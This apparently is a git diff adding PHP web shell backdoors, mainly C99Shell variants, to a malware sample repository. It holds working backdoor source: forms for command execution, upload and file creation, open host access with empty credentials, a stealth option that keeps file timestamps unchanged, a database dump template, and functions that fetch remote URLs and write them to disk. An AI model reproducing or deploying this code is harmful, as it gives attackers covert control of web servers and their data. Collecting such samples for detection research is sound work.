+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
    ");}}}} + natsort($images); + $k = array_keys($images); + echo "
    "; + foreach ($k as $u) {echo $u.":
    ";} + echo "
    "; + } + exit; +} +if ($act == "about") {echo "
    Credits:
    Idea, leading and coding by tristram[CCTeaM].
    Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].
    Thanks all who report bugs.
    All bugs send to tristram's ICQ #656555


    Edited by Oreozone";} +?> +
    + + +

    :: Command execute ::

    Enter:
     
    Select:
     
    +
    + + +
    :: Search ::
      - regexp 

    :: Upload ::
     
    +
    +
    :: Make Dir ::
     
    :: Make File ::
     
    +
    +
    :: Go Dir ::
     
    :: Go File ::
     
    +
    +

    + ----{ + [I-_-I] BrainScan + }----

    + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.C99Shell.al b/PHP/Backdoor.PHP.C99Shell.al new file mode 100644 index 00000000..27cd43d6 --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.al @@ -0,0 +1,3545 @@ +$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.1"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "
    c99shell v.".$shver.": access denied"; + +$gzipencode = TRUE; //Encode with gzip? + +$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) + +$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server +$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server + +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "
    C99 Modified By Psych0
    "; +/* If you publish free shell and you wish +add link to your site or any other information, +put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +// Registered file-types. +//array( +//"{action1}"=>array("ext1","ext2","ext3",...), +//"{action2}"=>array("ext4","ext5","ext6",...), +//... +//) +$ftypes= array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + + $alici=' + +$dbismi="%s"; +$server="%s"; +$user="%s"; +$pass="%s"; +$veri_yolu = mysql_connect ("$server" , "$user" , "$pass" ); + +if ( ! $veri_yolu) die ("MySQL ile veri bağlantısı kurulamıyor!"); +mysql_select_db( "$dbismi" , $veri_yolu ) or die ("Veritabanı açılamıyor!".mysql_error() ); +$sonuc = mysql_query("SELECT * FROM %s"); +while ($satir = mysql_fetch_row($sonuc)) { +$dolma.=$satir[%d]."
    "; + } + @ob_clean(); +header("Content-type: application/force-download"); +header("Content-length: ".strlen($dolma)); + header("Content-disposition: attachment; filename=\"Dump.php\";"); +echo $dolma; +exit; + +'; + +// Registered executable file-types. +//array( +//string "command{i}"=>array("ext1","ext2","ext3",...), +//... +//) +//{command}: %f% = filename +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} +$dizin = str_replace("\\\\","\\",$dizin); +$dizinispd = htmlspecialchars($dizin); +/*dizin*/ +$real = realpath($dizinispd); +$path = basename ($PHP_SELF); +function dosyayicek($link,$file) +{ +$fp = @fopen($link,"r"); +while(!feof($fp)) +{ + $cont.= fread($fp,1024); +} +fclose($fp); + +$fp2 = @fopen($file,"w"); +fwrite($fp2,$cont); +fclose($fp2); +} + + + + +$exeftypes= array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); +function dosyicek($link) +{ +$fp = @fopen($link,"r"); +while(!feof($fp)) +{ + $cont.= fread($fp,1024); +} 